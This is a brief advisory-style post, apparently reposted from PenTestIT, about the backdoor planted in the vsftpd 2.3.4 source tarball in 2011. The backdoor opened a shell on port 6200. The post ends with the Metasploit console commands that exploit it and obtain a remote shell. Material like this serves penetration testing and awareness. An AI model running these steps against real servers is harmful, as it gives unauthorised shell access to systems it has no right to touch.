vsftpd version of 2.3.4 downloadable source code was compromised and a backdoor added to the code. Evans, the author of vsftpd . This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011.
The bad tarball included a backdoor in the code which would respond to a user logging in with a user name by listening on port 6200 for a connection and launching a shell when someone connects.
If you have upgarded your VSFTPD check it out.
Affected versions :
- vsftpd-2.3.4 from 2011-06-30
- use exploit/unix/ftp/vsftpd_234_backdoor
- set RHOST localhost
- set PAYLOAD cmd/unix/interact
- uname -a
출처 : PenTestIT